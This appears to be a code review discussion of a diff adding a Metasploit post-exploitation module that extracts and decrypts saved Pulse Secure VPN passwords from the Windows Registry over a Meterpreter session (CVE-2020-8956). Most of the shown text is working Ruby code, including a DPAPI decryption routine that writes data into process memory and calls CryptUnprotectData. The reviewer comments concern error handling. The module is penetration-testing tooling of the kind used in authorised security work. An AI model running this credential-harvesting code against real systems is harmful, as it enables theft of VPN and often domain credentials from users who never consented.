modules/post/windows/gather/credentials/pulse_secure.rb

```diff
@@ -0,0 +1,359 @@
+          This module extracts and decrypts saved Pulse Secure Connect Client passwords from the
+          Windows Registry. This module can only access credentials created by the user that the
+          Meterpreter session is running as.
+          Note that this module cannot link the password to a username unless the
+          Meterpreter sessions is running as SYSTEM. This is because the username associated
+          with a password is saved in 'C:\ProgramData\Pulse Secure\ConnectionStore\[SID].dat',
+          which is only readable by SYSTEM.
+          Note that for enterprise deployment, this username is almost always the domain
+          username.
+        },
+        'License' => MSF_LICENSE,
+        'References' => [
+          [ 'CVE', '2020-8956'],
+          [ 'URL', 'https://qkaiser.github.io/reversing/2020/10/27/pule-secure-credentials'],
+          [ 'URL', 'https://www.gremwell.com/blog/reversing_pulse_secure_client_credentials_store'],
+          [ 'URL', 'https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44601' ]
+        ],
+        'Platform' => ['win'],
+        'SessionTypes' => ['meterpreter'],
+        'Author' => ['Quentin Kaiser <kaiserquentin[at]gmail.com>']
+      )
+    )
+
+  end
+
+  # Decrypts `data` encrypted with Windows DPAPI by calling CryptUnprotectData
+  # with `entropy` as pOptionalEntropy value.
+  #
+  # @param [String] data Encrypted data, pDataIn per crypt32.dll.
+  # @param [String] entropy Optional entropy value, pOptionalEntropy per crypt32.dll
+  #
+  # @return [String] Decrypted value or empty string in case of failure.
+  #
+  def decrypt_reg(data, entropy)
+    rg = session.railgun
+    pid = session.sys.process.getpid
+    process = session.sys.process.open(pid, PROCESS_ALL_ACCESS)
+
+    # write entropy to memory
+    emem = process.memory.allocate(128)
+    process.memory.write(emem, entropy)
+    # write encrypted data to memory
+    mem = process.memory.allocate(128)
+    process.memory.write(mem, data)
+
+    if session.sys.process.each_process.find { |i| i['pid'] == pid } ['arch'] == 'x86'
+      addr = [mem].pack('V')
+      len = [data.length].pack('V')
+
+      eaddr = [emem].pack('V')
+      elen = [entropy.length].pack('V')
+
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 8)
+      len, addr = ret['pDataOut'].unpack('V2')
+    else
+      # Convert using rex, basically doing: [mem & 0xffffffff, mem >> 32].pack("VV")
+      addr = Rex::Text.pack_int64le(mem)
+      len = Rex::Text.pack_int64le(data.length)
+
+      eaddr = Rex::Text.pack_int64le(emem)
+      elen = Rex::Text.pack_int64le(entropy.length)
+
+      ret = rg.crypt32.CryptUnprotectData("#{len}#{addr}", 16, "#{elen}#{eaddr}", nil, nil, 0, 16)
+      p_data = ret['pDataOut'].unpack('VVVV')
+      len = p_data[0] + (p_data[1] << 32)
+      addr = p_data[2] + (p_data[3] << 32)
+    end
+    return '' if len == 0
+
+    return process.memory.read(addr, len)
```

Comment:
Probably good to add in 
```
rescue Rex::Post::Meterpreter::RequestError => e
      vprint_error(e.message)
end
```
As per your previous code to catch any errors that may occur since you are using the `session` object here. Also your other code is doing similar behavior so this will bring everything in line.

Reply:
See f4bb5f7e10

Reply:
See the proposed change for this on the `nil` error. Otherwise looks good.

Reply:
Applied the proposed change on the `nil` error. Thanks :+1: